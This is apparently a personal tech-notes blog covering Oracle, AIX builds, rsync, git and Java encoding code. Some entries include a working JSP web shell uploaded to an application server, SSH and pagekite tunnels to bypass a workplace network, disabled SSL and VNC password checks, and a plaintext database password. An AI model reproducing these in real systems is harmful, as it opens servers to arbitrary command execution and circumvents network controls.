                part1 = Integer.decode("0x" + code.substring(0, 2));
                part2 = Integer.decode("0x" + code.substring(2, 4));

                surrogatePair.write(part1);
                surrogatePair.write(part2);
                surrogatePair.close();

                i++;

                output.append("${" + extBCharMap.size() + "}");
                extBCharMap.put(String.valueOf(extBCharMap.size()),
                        surrogatePair.toString("UTF-16BE"));
            } else {
                if (Character.isDefined(interfaceStr.charAt(i)))
                    output.append(interfaceStr.charAt(i));
            }
        }

        return output.toString();
    }

    private static void checkExtBCharMap(HashMap  extBCharMap) throws Exception {
      if (extBCharMap.size() > 0) {
        StringBuilder sb = new StringBuilder();
        for (String extBChar : extBCharMap.values()) {
          sb.append(showHexCode(extBChar));
        }
        Exception e = new Exception( "Surrogate pair characters are found in unexpected fields. " + sb.toString());
        throw e;
        }
      }

   private static String showHexCode(String extBChar) {
    StringBuilder sb = new StringBuilder();

    String codepoint = "U+" + Long.toHexString(extBChar.codePointAt(0)).toUpperCase();

    sb.append(codepoint);

    sb.append(" ");

    /*for (short i = 0; i < extBChar.length();i++) {
      String code = Long.toHexString(extBChar.charAt(i));

      sb.append("0x" + code);
      sb.append(" ");
     }*/

    return sb.toString();

   }

   // private method(s) -- END public static void main(String[] args) throws Exception {
    HashMap extBCharMap = new HashMap();

    ByteArrayOutputStream surrogatePair = new ByteArrayOutputStream();

    int a = Integer.decode("0x" + Long.toHexString(Long.parseLong("11011000", 2)));

    System.out.println("a = " + a);

    int b = Integer.decode("0x" + Long.toHexString(Long.parseLong("01000000", 2)));

    surrogatePair.write(a);

    surrogatePair.write(b);

    a = Integer.decode("0x" + Long.toHexString(Long.parseLong("11011100", 2)));
    b = Integer.decode("0x" + Long.toHexString(Long.parseLong("11011001", 2)));

    surrogatePair.write(a);
    surrogatePair.write(b);
    surrogatePair.close();

    extBCharMap.put("1", surrogatePair.toString("UTF-16BE"));
    extBCharMap.put("2", surrogatePair.toString("UTF-16BE"));

    replacePlaceHolder(extBCharMap, "bb${1}uiuiu", "CASEAP", "CHI_SURNAME", "1235", "AP_CHI_FIRST");

    System.out.println("size of extBCharMap: " + extBCharMap.size());
    checkExtBCharMap(extBCharMap);
 }

2014-03-11

2014-03-11

insert clob field by cx_Oracle

import cx_Oracle, os

os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"

def main():
    dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='xxrac')
    con = cx_Oracle.connect('user','password',dsn_tns)

    try:
        cur = con.cursor()
        for i in range(50):
            report_id = '%LSA' + str(i).rjust(3, '0') + '%'
            #print report_id
            cur.execute("SELECT rpt_url from print_para where rpt_url like '%s' ORDER BY last_update desc" %(report_id))
            row = cur.fetchone()
            if row != None:
                print 'http://xxserver' + row[0]

        cur.close()
    finally:
        print 'close connection'
        con.close()

def insert_news():
    dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='xxrac')
    con = cx_Oracle.connect('user2','user2uat0675',dsn_tns)

    dhprd_dsn_tns = cx_Oracle.makedsn('server2', 1521, 'prd')
    dhprd_con = cx_Oracle.connect('user2x','password',prd_dsn_tns)

    try:
        dhprd_cur = dhprd_con.cursor()
        dhprd_cur.execute("SELECT NEWS_ID,GROUP_ID,CREATION_DATE,PUBLISH_START_DATE,PUBLISH_END_DATE,NEWS_TITLE,NEWS_TITLE_CHI,STATUS,LAST_UPDATE,UPDATE_BY,UPDATE_ROLE,NEWS_TYPE,URL,URL_CHI,URL_SIMP_CHI,PRESS_RELEASE, NEWS_CONTENT from news ")
        res = dhprd_cur.fetchall()

        for row in res:
            cur = con.cursor()
            print row[0]
            NEWS_ID = row[0]
            GROUP_ID = row[1]
            CREATION_DATE = row[2]
            PUBLISH_START_DATE = row[3]
            PUBLISH_END_DATE = row[4]
            NEWS_TITLE = row[5]
            NEWS_TITLE_CHI = row[6]
            STATUS = row[7]
            LAST_UPDATE = row[8]
            UPDATE_BY = row[9]
            UPDATE_ROLE = row[10]
            NEWS_TYPE = row[11]
            URL = row[12]
            URL_CHI = row[13]
            URL_SIMP_CHI = row[14]
            PRESS_RELEASE = row[15]
            NEWS_CONTENT = row[16]

            #cur.execute("insert into news(NEWS_ID,GROUP_ID,CREATION_DATE,PUBLISH_START_DATE,PUBLISH_END_DATE,NEWS_TITLE,NEWS_TITLE_CHI,STATUS,LAST_UPDATE,UPDATE_BY,UPDATE_ROLE,NEWS_TYPE,URL,URL_CHI,URL_SIMP_CHI,PRESS_RELEASE) values (:NEWS_ID,:GROUP_ID,:CREATION_DATE,:PUBLISH_START_DATE,:PUBLISH_END_DATE,:NEWS_TITLE,:NEWS_TITLE_CHI,:STATUS,:LAST_UPDATE,:UPDATE_BY,:UPDATE_ROLE,:NEWS_TYPE,:URL,:URL_CHI,:URL_SIMP_CHI,:PRESS_RELEASE)", {'NEWS_ID' : NEWS_ID,'GROUP_ID' : GROUP_ID,'CREATION_DATE' : CREATION_DATE,'PUBLISH_START_DATE' : PUBLISH_START_DATE,'PUBLISH_END_DATE' : PUBLISH_END_DATE,'NEWS_TITLE' : NEWS_TITLE,'NEWS_TITLE_CHI' : NEWS_TITLE_CHI,'STATUS' : STATUS,'LAST_UPDATE' : LAST_UPDATE,'UPDATE_BY' : UPDATE_BY,'UPDATE_ROLE' : UPDATE_ROLE,'NEWS_TYPE' : NEWS_TYPE,'URL' : URL,'URL_CHI' : URL_CHI,'URL_SIMP_CHI' : URL_SIMP_CHI,'PRESS_RELEASE' : PRESS_RELEASE})

            #cur.execute("update news set NEWS_CONTENT = :NEWS_CONTENT, NEWS_CONTENT_CHI = :NEWS_CONTENT_CHI where news_id = :news_id", {'news_id':NEWS_ID, 'NEWS_CONTENT':'aa', 'NEWS_CONTENT_CHI':'bb'})

            #cur.execute("select NEWS_CONTENT from news where news_id = :news_id for update", {'news_id':NEWS_ID})
            print NEWS_CONTENT.read()
            '''row2, = cur.fetchone()
            print NEWS_CONTENT.read()
            row2.write(NEWS_CONTENT.read())'''
            #con.commit()
            cur.close()
            break

        dhprd_cur.close()

    finally:
        print 'close connection'
        con.close()
        dhprd_con.close()



def insert_news_content():
    dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='xxrac')
    con = cx_Oracle.connect('user2','user2uat0675',dsn_tns)

    dhprd_dsn_tns = cx_Oracle.makedsn('server2', 1521, 'prd')
    dhprd_con = cx_Oracle.connect('user2','password',dhprd_dsn_tns)

    try:
        dhprd_cur = dhprd_con.cursor()
        dhprd_cur.execute("SELECT NEWS_ID from news order by NEWS_ID")
        res = dhprd_cur.fetchall()
        news_ids = []
        for row in res:
            news_ids.append(row[0])


        for NEWS_ID in news_ids:
            dhprd_cur.execute("SELECT NEWS_ID, NEWS_CONTENT, NEWS_CONTENT_CHI from news where NEWS_ID = :NEWS_ID", {'NEWS_ID':NEWS_ID})
            row = dhprd_cur.fetchone()

            NEWS_ID = row[0]
            NEWS_CONTENT = row[1].read()
            NEWS_CONTENT_CHI = row[2].read()

            cur = con.cursor()

            print NEWS_ID
            cur.execute('select news_content, news_content_chi from news where news_id = :news_id for update', {'news_id':NEWS_ID})
            c1, c2 = cur.fetchone()
            c1.open()
            c1.trim()
            c1.write(NEWS_CONTENT)
            c1.close()

            c2.open()
            c2.trim()
            c2.write(NEWS_CONTENT_CHI)
            c2.close()

        con.commit()
        cur.close()
        dhprd_cur.close()

    finally:
        print 'close connection'
        con.close()
        dhprd_con.close()

insert_news_content()

2014-03-06

2014-03-06

rsync in aix

Install popt-1.7-1.aix4.3.ppc.rpm & rsync-2.5.4-3.aix5.1.ppc.rpm from http://bullfreeware.com/
Check manual by rsync –help

Write shell script as below

LOGDIR=/usr/prod/logs
LOGFILE=rsync.log
startBackup() {
   echo "****** Start backup now `date`"
   rsync -uptorgvlHaz -e "ssh -i /home/user/.ssh/id_dsa" /source_directory/* support@remote_server:/destination
   echo "****** Finish backup at `date`"
   echo ""
}
main() {
 startBackup
}
main &raquo; $LOGDIR/$LOGFILE 2>&1

Refer to Easy Automated Snapshot-Style Backups with Linux and Rsync
Using rsync and cron to automate incremental backups

2014-02-25

2014-02-25

Enable audit in oracle

Check audit settting

select name,value from v$parameter where name like 'audit%'
show parameter audit;

Change setting of audit_trail

Method 1

1 2	alter system set audit_trail=DB,Extended scope=spfile (cannot set both as Change Static Parameters Through the SPFILE) alter system set audit_sys_operations=true scope=spfile

Method 2

add config in $ORACLE_HOME/dbs/init**.ora as below since db starting with pfile, error **’specified initialization parameter can not be modified’*
audit_trail=DB ( oracle9i not support ‘Extended’ in init*.ora file)
audit_sys_operations=true

Restart db

1 2	shutdown immediate; startup;

Check audit option in db

select * from dba_stmt_audit_opts OR select * from dba_priv_audit_opts

Make some audit option

AUDIT ALTER TABLE;
AUDIT DELETE ANY TABLE;
AUDIT DROP ANY TABLE;
AUDIT AUDIT ANY;
AUDIT AUDIT SYSTEM;

AUDIT ALL BY FRED BY ACCESS;
audit select table, update table, delete table,
      insert table, execute procedure by FRED by access;

AUDIT SELECT, INSERT, DELETE
     ON jward.dept
     BY ACCESS
     WHENEVER SUCCESSFUL;

AUDIT SELECT TABLE, INSERT TABLE, DELETE TABLE, EXECUTE PROCEDURE
      BY ACCESS
      WHENEVER NOT SUCCESSFUL;

AUDIT SELECT, UPDATE, DELETE ON SYS.AUD$ BY ACCESS;
-------- disable them
NOAUDIT ALTER TABLE;
...

List audit record

select * from dba_audit_session order by timestamp desc
select * from dba_audit_trail order by timestamp desc
select * from dba_audit_object order by timestamp desc;
select * from dba_audit_statement order by timestamp desc;

House keep sys.aud$ to reduce its size

truncate sys.aud$ or delete sys.aud$

Trace user’s behavior

show parameter dump

Find background_dump_dest/alert_sid.log
This file would give you some info about user’s behavior in user_dump_dest/sid_ora_pid.trc

Example

A user Fred was missing someday in db, how to find out the reason. Follow these step

check alert.log
check sid_ora_pid.trc
check dba_audit_session and dba_audit_trail

Get the user’s role and privilege

USER_SYS_PRIVS, USER_TAB_PRIVS, USER_ROLE_PRIVS
DBA_SYS_PRIVS, DBA_TAB_PRIVS, DBA_ROLE_PRIVS

select * from DBA_role_privs

Misc

xming + putty + X11 forwarding
run $ORACLE_HOME/bin/dbca

Reference

Oracle audit command tips
Introduction to Simple Oracle Auditing
Configuring and Administering Auditing
Auditing Database Activity
Auditing Database Use
Verifying Security Access with Auditing
Starting Up a Database
Spfile and Init.ora Parameter File Startup of an Oracle9i Instance
Change Static Parameters Through the SPFILE
Oracle_9i_AUDIT_SOP
Oracle Audit 审计
 Managing User Privileges and Roles

2014-02-25

2014-02-25

dive into git

git clone = svn co
git remote show = svn info
git branch + git checkout = git switch

git clone = git init + git remote 

step:
git init
mkdir project.git
cd project.git
git remote add -f -t master -m master orgin git://example.com/git.git (or https://example.com/git.git)
git merge origin
touch file.txt
git commit -m 'test commit'
git push origin master

git branch
git checkout
git rebase
git reset --hard

2014-02-06

2014-02-06

Pass value to report engine via prompt dialog

There are two mode that call to render a report template,
Crystal Report can be called with/without paramter values to render a report template. When it is called without parameter, an input dialog will be prompted.
Those parameter values are serialized by JSON format, the parameter names are as following:

CRVCompositeViewState
CRVEventTarget
CRVEventArgument

It is found that a warning message the report requires parameter values that need to be supplied by the client before further processing” will be shown when values are entered.
So upset!!
I used curl to debug the program, found that parameter CRVCompositeViewState and CRVEventTarget would affect the result of putting paramter value to report.
No idea, to solve the problem, I used a ugly approach that removing parameter CRVCompositeViewState and CRVEventTarget in allInOne.js to let them not be passed to server side.

Reference
升级Crystal Report 8.5 to Crystal Report 2011

2014-01-29

2014-01-29

Create sock proxy via remote PC as a springboard

Install cygwin in my remote PC

Upload a console.jsp to application server

<%@page import="java.io.*" %>
  <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>

  <script type="text/javascript">
  $(function(){
    $("#command").focus();
    var cmd = '<%=request.getParameter("command")%>';
    $("#command").val(cmd == 'null' ? '' : cmd);
  });
  </script>


  <body bgcolor="#cdc0cd">
  <form action="console.jsp">
    Command: <textarea name="command" rows="10" cols="50" id="command"></textarea><br/>
    <input type="submit" name="submit" value="submit"/>
  </form>

  <%
  String cmd = request.getParameter("command");
  if(cmd != null && cmd.length() > 0){
    //Runtime.getRuntime().exec(cmd);
    out.println("command = " + cmd + "<p><p>");
    StringBuilder sb = new StringBuilder();
    String s = null;
    try {
        Process p = Runtime.getRuntime().exec(cmd);

        BufferedReader stdInput = new BufferedReader(new
             InputStreamReader(p.getInputStream()));

        BufferedReader stdError = new BufferedReader(new
             InputStreamReader(p.getErrorStream()));

        out.print("<h2>result as below</h2>");
        while ((s = stdInput.readLine()) != null) {
            sb.append(s+"<br/>");
        }

        // read any errors from the attempted command
        sb.append("<hr><h2>error as below(if any)</h2>");
        while ((s = stdError.readLine()) != null) {
            sb.append(s);
        }
            out.print(sb.toString());
    }
    catch (IOException e) {
        sb.append("exception happened - here's what I know: ");
        e.printStackTrace();
    }
  }
  %>

Disable port 443 in httpd

1
2
3

ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/443-hide.bat
copy "C:\Program Files\IBM\HTTPServer\conf\httpd.conf" "C:\Users\xx\Downloads\fw\httpd-latest.conf"
copy "C:\Users\xx\Downloads\fw\httpd2.conf" "C:\Program Files\IBM\HTTPServer\conf\httpd.conf"

1
2
3

ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/restart.bat 
net stop IBMHTTPServer7.0
net start IBMHTTPServer7.0

Forward port 443 to 22

ssh -i /home/prls/fw/id_rsa xx@server /cygdrive/c/Users/xx/fw/443-open.bat 
rem wscript.exe C:\Users\xx\Downloads\fw\443-open.vbs C:\Users\xx\Downloads\plink.exe -load local -N <span style="font-size:12.5px;line-height:1.5;"></span>  5. Stop process plink
tasklist|grep plink
taskkill /f /pid 7944

Enable port 443 in httpd

1 2	ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/443-show.bat copy "C:\Users\xx\Downloads\fw\httpd-latest.conf" "C:\Program Files\IBM\HTTPServer\conf\httpd.conf"

See config in httpd

1 2	ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/cat-httpd.bat copy "C:\Users\xx\Downloads\fw\httpd-latest.conf" "C:\Program Files\IBM\HTTPServer\conf\httpd.conf"

Make it effective

ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/restart.bat

Fallback a backup version

ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/443-fallback.bat

2014-01-21

2014-01-21

Make my home's PC as proxy server to surf internet

Step

At home

Install cygwin and openssh package in my home’s PC
Install pagekite and run following command as a scheduled job
python.exe pagekite.py 22 ssh:YOU.pagekite.me

At workstation

Use putty to login YOU.pagekite.me:22 through http proxy **YOU.pagekite.me:443
Create dynamic port forwarding -D1080 in localhost
In putty: Connection -> Seconds between keepalives should be larger than 0(such as 10)
Setup firefox to use socks proxy localhost:1080

Another method(Using Squid)

at home: install squid
at workstation: using putty to create local port forwarding: **-L3128:localhost:3128
Setup firefox to use http proxy localhost:3128

PS: Proxy tools

connect or netcat or corkscrew or nc proxycap or httptunnel stunnel

Reverse Proxy

pagekite
localtunnel
proxylocal

VNC

vnc loopback connections are not enabled
Solved:

enable Allow loopback connections
uncheck the Use password
Ref:
Tunnelling VNC over SSH
VNC: Server Error message “Loopback connections are disabled”

Reference

ssh pagekite
putty pagekite
安裝 Squid Proxy Server @ Windows XP

2014-01-17

2014-01-17

Run a program as windows service or background job

nssm

Download nssm from http://nssm.cc/download and follow its usage to install custom program as service.

instsrv

instsrv myProgram “c:\Program Files\Windows Resource Kits\Tools\srvany.exe”

install_service.reg

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\myProgram\Parameters]
"AppDirectory"="d:\\bin\\myProgram"
"Application"="D:\\bin\\myProgram\\myProgram.exe"
"AppParameters"="-d -f d:\\MyWorkDir\\myProgram.ini"

sc config myProgram depend= Tcpip
net start myProgram or sc start myProgram

java

public class Run{
        public static void main(String[] args) throws InterruptedException, IOException {
                  Process pr = Runtime.getRuntime().exec("D:\\bin\\myProgram\\myProgram.exe -d -f   d:\\MyWorkDir\\myProgram.ini");
                  pr.waitFor();
        }
    }
    javaw -cp . Run

wscript

run.vbs

1
2
3

Set WshShell = WScript.CreateObject("WScript.Shell")
obj = WshShell.Run("plink.exe -load remotes_server -N", 0)
set WshShell = Nothing

wscript run.vbs

at

if the session is closed such as remote desktop(mstsc), above program will be shutdown. But schedule job has no this problem at 17:50 wscript run.vbs then delete this scheduled job

run nohup in cygwin

nohup wscript run.vbs 2>&1 &

2014-01-14

2014-01-14

SSL certificate problem using git in AIX

After installed git in AIX, when run git clone found that SSL certificate problem: unable to get local issuer certificate
Solution as below collected from google

No ssl verify

export GIT_SSL_NO_VERIFY=true ( unset GIT_SSL_NO_VERIFY)
git config http.sslVerify false ( git config --unset http.sslVerify)
curl http://curl.haxx.se/ca/cacert.pem -o /var/ssl/cacert.pem (not work, but no /etc/ssl or /etc/openssl folder in AIX)

SSL verify

.git/config

1 2	[http] sslCAInfo=/var/ssl/certs/cacert.pem

git config --system (or --global or --local) http.sslcainfo /var/ssl/certs/cacert.pem

http://stackoverflow.com/questions/3777075/ssl-certificate-rejected-trying-to-access-github-over-https-behind-firewallrhttp://stackoverflow.com/questions/3777075/ssl-certificate-rejected-trying-to-access-github-over-https-behind-firewall

2014-01-09

2014-01-09

ways of making process run in background

zdaemon
nohup 2>&1 &
nodejs forever supervisor nodemon
bg/fg
tmux/screen
ctrl + z

http://ridingpython.blogspot.hk/2011/08/turning-your-python-script-into-linux.html
http://en.wikipedia.org/wiki/Nohup

2014-01-08

2014-01-08

安装wssh, zdaemon,pagekite等

安装wssh遇到许多问题和有趣的东西，记录如下：

要安装wssh，需要先装 gevent和 pyCrypto，其余用 sudo pip install flask paramiko werkzeug jinja2 ecdsa gevent-websocket等
从https://github.com/aluzzardi/wssh.git下载wssh python setup.py install 运行sudo wsshd, 如果发现缺少包，就用pip install
fix问题, 用浏览器打开http://ip:5000
change from geventwebsocket import WebSocketHandler to from geventwebsocket.handler import WebSocketHandler in file EGG-INFO/scripts/wsshd
change raw.github.com to rawgithub.com in file wssh/templates/index.html
运行命令sudo wssh也可以连接

安装zdaemon，

1 2	pip install zdaemon zdaemon -p wsshd start

安装PageKite

1
2
3

curl -s https://pagekite.net/pk/ |sudo bash
pagekite.py --signup
pagekite.py 5000 mypi.pagekite.me

Reference

https://github.com/amitsaha/raspi-guide/blob/master/doc/install.rst
http://echorand.me/2012/10/13/web-based-ssh-access-to-your-raspberry-pi/
http://www.vpsee.com/2013/06/invoke-a-linux-shell-with-ssh-account-from-browser/

2014-01-06

2014-01-06

Build pycrypto in AIX

Download pycrypto-2.6.1 from https://www.dlitz.net/software/pycrypto/
Unzip pycrypto tar xzvf pycrypto-2.6.1.tar.gz
set environment vairable and build source code export ac_cv_func_malloc_0_nonnull=yes(It would throw Error “undefined symbol rpl_malloc”) python setup.py buildRefer to iperf-for-arm-cross-compile and openwrt
Download dependencies and install them http://www.bullfreeware.com/recherche.php
- gmp-devel-5.1.3-1.aix6.1.ppc.rpm
  http://www.perzl.org/aix/index.php
- libtomcrypt-1.17-1.aix5.1.ppc.rpm
- libtomcrypt-devel-1.17-1.aix5.1.ppc.rpm
- libtommath-0.42.0-1.aix5.1.ppc.rpm

Makefile as below

CC=gcc
CFLAGS=-pthread -fno-strict-aliasing -fwrapv -Wall -Wstrict-prototypes -fPIC -std=c99 -O3 -fomit-frame-pointer -Isrc/ -I/opt/freeware/include/python2.7 -c
LDFLAGS=-pthread -shared -lpython2.7
OBJ_DIR=build/temp.aix-7.1-2.7/src
SO_DIR=build/lib.aix-7.1-2.7/Crypto

all:
    echo "building 'Crypto.PublicKey._fastmath' extension"
    $(CC) $(CFLAGS) src/_fastmath.c -o $(OBJ_DIR)/fastmath.o
    $(CC) $(LDFLAGS) -lgmp -lm $(OBJ_DIR)/fastmath.o -o $(SO_DIR)/PublicKey/_fastmath.so  (added -lgmp -lm)

    echo "building 'Crypto.Hash._MD2' extension"
    $(CC) $(CFLAGS) src/MD2.c -o $(OBJ_DIR)/MD2.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/MD2.o -o $(SO_DIR)/Hash/_MD2.so

    echo "building 'Crypto.Hash._SHA256' extension"
    $(CC) $(CFLAGS) src/MD2.c -o $(OBJ_DIR)/SHA256.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/MD2.o -o $(SO_DIR)/Hash/_SHA256.so

    echo "building 'Crypto.Hash._SHA224' extension"
    $(CC) $(CFLAGS) src/SHA224.c -o $(OBJ_DIR)/SHA224.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/SHA224.o -o $(SO_DIR)/Hash/_SHA224.so

    echo "building 'Crypto.Hash._SHA384' extension"
    $(CC) $(CFLAGS) src/SHA384.c -o $(OBJ_DIR)/SHA384.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/SHA384.o -o $(SO_DIR)/Hash/_SHA384.so

    echo "building 'Crypto.Hash._SHA512' extension"
    $(CC) $(CFLAGS) src/SHA512.c -o $(OBJ_DIR)/SHA512.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/SHA512.o -o $(SO_DIR)/Hash/_SHA512.so

    echo "building 'Crypto.Hash._RIPEMD160' extension"
    $(CC) $(CFLAGS) src/RIPEMD160.c -o $(OBJ_DIR)/RIPEMD160.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/RIPEMD160.o -o $(SO_DIR)/Hash/_RIPEMD160.so

    echo "building 'Crypto.Cipher._AES' extension"
    $(CC) $(CFLAGS) src/AES.c -o $(OBJ_DIR)/AES.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/AES.o -o $(SO_DIR)/Cipher/_AES.so

    echo "building 'Crypto.Cipher._ARC2' extension"
    $(CC) $(CFLAGS) src/ARC2.c -o $(OBJ_DIR)/ARC2.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/ARC2.o -o $(SO_DIR)/Cipher/_ARC2.so

    echo "building 'Crypto.Cipher._Blowfish' extension"
    $(CC) $(CFLAGS) src/Blowfish.c -o $(OBJ_DIR)/Blowfish.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/Blowfish.o -o $(SO_DIR)/Cipher/_Blowfish.so

    echo "building 'Crypto.Cipher._CAST' extension"
    $(CC) $(CFLAGS) src/CAST.c -o $(OBJ_DIR)/CAST.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/CAST.o -o $(SO_DIR)/Cipher/_CAST.so

    echo "building 'Crypto.Cipher._DES' extension"
    $(CC) $(CFLAGS) -I/opt/freeware/include/tomcrypt src/DES.c -o $(OBJ_DIR)/DES.o (added -I/opt/freeware/include/tomcrypt)
    $(CC) $(LDFLAGS) -ltomcrypt $(OBJ_DIR)/DES.o -o $(SO_DIR)/Cipher/_DES.so  (added -ltomcrypt)

    echo "building 'Crypto.Cipher._DES3' extension"
    $(CC) $(CFLAGS) -I/opt/freeware/include/tomcrypt src/DES3.c -o $(OBJ_DIR)/DES3.o  (added -I/opt/freeware/include/tomcrypt)
    $(CC) $(LDFLAGS) -ltomcrypt $(OBJ_DIR)/DES3.o -o $(SO_DIR)/Cipher/_DES3.so (added -ltomcrypt)

    echo "building 'Crypto.Cipher._ARC4' extension"
    $(CC) $(CFLAGS) src/ARC4.c -o $(OBJ_DIR)/ARC4.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/ARC4.o -o $(SO_DIR)/Cipher/_ARC4.so

    echo "building 'Crypto.Cipher._XOR' extension"
    $(CC) $(CFLAGS) src/XOR.c -o $(OBJ_DIR)/XOR.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/XOR.o -o $(SO_DIR)/Cipher/_XOR.so

    echo "building 'Crypto.Util.strxor' extension"
    $(CC) $(CFLAGS) src/strxor.c -o $(OBJ_DIR)/strxor.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/strxor.o -o $(SO_DIR)/Util/strxor.so

    echo "building 'Crypto.Util._counter' extension"
    $(CC) $(CFLAGS) src/_counter.c -o $(OBJ_DIR)/counter.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/counter.o -o $(SO_DIR)/Util/_counter.so

2013-12-31

2013-12-31

Install gevent in AIX with gcc

greenlet

Download greenlet-0.4.1.zip from https://github.com/python-greenlet/greenlet

1
2
3

sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I. -I/opt/freeware/include/python2.7 -c greenlet.c -o build/greenlet.o
sudo gcc -shared -lpthreads -lpython2.7 -o build/greenlet.so build/greenlet.o
sudo cp build/greenlet.so /opt/freeware/lib/python2.7/site-packages/

libev

Download libev-4.15.tar.gz from http://dist.schmorp.de/libev/

1 2	./configure --prefix=/usr/local/libev gmake && sudo gmake install

c-ares

Download c-ares from http://c-ares.haxx.se/

1 2	./configure --prefix=/usr/local/c-ares gmake && sudo gmake install

Or just run
run configure CONFIG_COMMANDS= CONFIG_FILES=

gevent

Download gevent-1.0.tar.gz from https://pypi.python.org/pypi/gevent#downloads
1
2
3
mkdir build
mkdir build/gevent
cp gevent/*py build/gevent

build core.so

1
2

sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 -I/usr/local/libev/include gevent/gevent.core.c -c -o build/gevent/core.o 
gcc -pthread -shared -lpython2.7 -L/usr/local/libev/lib -lev -lm build/gevent/core.o -o build/gevent/core.so ( **-lm should be added** otherwise error throw “ld: 0711-317 ERROR: Undefined symbol: .floor”)

build ares.so
1.change folder to c-ares and then run configure CONFIG_COMMANDS= CONFIG_FILES=
In file gevent/dnshelper.c, replace
1
2
3
#ifdef HAVE_NETDB_H
#include <netdb.h>
#endif
to
#include <netdb.h> reason: Error throw “dereferencing pointer to incomplete type” Ref to
http://richliu.pixnet.net/blog/post/25765892-gcc-%3A-error%3A-dereferencing-pointer-to-incomplete-type
http://blog.csdn.net/david_xtd/article/details/7781160
http://liuzhigong.blog.163.com/blog/static/1782723752011314113857852/

2.build share object

1
2

gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 -Ic-ares gevent/gevent.ares.c -c -o build/gevent/gevent.ares.o
gcc -pthread -shared -lpython2.7 -L/home/sms_dev/soft/usr/local/c-ares/lib -lcares -lrt -o build/gevent/ares.so build/gevent/gevent.ares.o

build semaphore.so

1
2

sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 gevent/gevent.**semaphore.c -c -o build/gevent/gevent.**semaphore.o 
gcc -pthread -shared -lpython2.7 build/gevent/gevent.**semaphore.o -o build/gevent/**semaphore.so

build **util.so

1
2

sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 gevent/gevent.**util.c -c -o build/gevent/gevent._util.o 
gcc -pthread -shared -lpython2.7 build/gevent/gevent.**util.o -o build/gevent/**util.so

Reference:

Linux 的 .a / .so / .la 函式庫的差異
 问个.a和.so的区别
 Linux下静态链接库与动态链接库的区别
 凡你醉处你说过皆非他乡
 淺談coroutine與gevent

2013-12-30

2013-12-30

Reset password through web console

I have a web console in AIX, but | (pipe stream), » and > do not work. How can I reset my password for account xx.

method 1

mkdir /home/xx/.ssh
ssh-keygen -t rsa -P password -f /home/xx/.ssh/id_rsa (ssh-keygen -t rsa -P '' -f /home/xx/.ssh/id_rsa not work since no passphase)
cp id_rsa.pub authorized_keys
chmod 600 /home/xx/.ssh/authorized_keys
chown -R xx:sms /home/xx/.ssh
chmod 700 /home/xx/.ssh
cat /home/xx/.ssh/id_rsa(then copy and paste in web console, save as id_rsa, then save as private key in putty)

method 2

rpm or download **wget** prepare id_rsa, id_rsa.pub, authorized_keys
/home/xx/soft/usr/local/bin/wget -O /home/xx/.ssh/id_rsa http://10.13.135.40:8080/dh/keygen/id_rsa
/home/xx/soft/usr/local/bin/wget -O /home/xx/.ssh/id_rsa.pub http://10.13.135.40:8080/dh/keygen/id_rsa.pub
/home/xx/soft/usr/local/bin/wget -O /home/xx/.ssh/authorized_keys http://10.13.135.40:8080/dh/keygen/authorized_keys
chown -R xx:sms /home/xx/.ssh
chmod 700 /home/xx/.ssh

method 3 (fail in AIX)

1 2	echo "xx1234\nxx1234" \| (passwd -stdin xx) echo -e "xx1234\nxx1234" \| (passwd -stdin xx) – in Linux

method 4 (fail in AIX)

echo "xx:xx1234" | chpasswd -c

method 5

download expect package from http://www.oss4aix.org/download/RPMS/

rpm -ivh libpng-1.6.7-1.aix5.1.ppc.rpm
rpm -ivh zlib-1.2.8-1.aix5.1.ppc.rpm
rpm -ivh bzip2-1.0.6-1.aix5.1.ppc.rpm
rpm -ivh freetype2-2.5.2-1.aix5.1.ppc.rpm
rpm -ivh expat-2.1.0-1.aix5.1.ppc.rpm
rpm -ivh fontconfig-2.10.2-1.aix5.1.ppc.rpm
rpm -ivh tk-8.5.15-1.aix5.1.ppc.rpm
rpm -ivh tcl-8.5.15-1.aix5.1.ppc.rpm
rpm -ivh expect-5.45-1.aix5.1.ppc.rpm

write expect script /home/xx/chpass.sh

#!/usr/bin/expect
spawn passwd support
expect "*password*"
send "xx1234\n"
expect "*password*"
send "xx1234\n" exit

Others

